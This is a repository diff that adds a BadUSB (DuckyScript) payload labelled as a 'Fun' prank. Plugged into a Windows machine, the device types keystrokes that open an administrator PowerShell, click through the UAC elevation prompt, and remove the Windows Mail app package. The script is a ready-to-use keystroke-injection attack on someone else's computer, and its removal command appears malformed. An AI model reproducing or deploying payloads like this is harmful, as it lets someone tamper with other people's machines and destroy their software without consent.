🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/FUN/DeleteWindowsMail.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Deletes the Windows Mail app.
     3 +REM Version: 1.0
     4 +REM Category: Fun
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 300
     8 +REM Start PowerShell as Admin
     9 +STRING powershell Start-Process powershell -Verb runAs
     10 +DELAY 300
     11 +ENTER
     12 +DELAY 500
     13 +LEFTARROW
     14 +DELAY 450
     15 +ENTER
     16 +DELAY 600
     17 +REM Deletes Windows Mail app
     18 +STRING AppxPackage Microsoft.windowscommunicationsapps | Remove-AppxPackage
     19 +DELAY 200
     20 +ENTER
Please wait...
Page is in error, reload to recover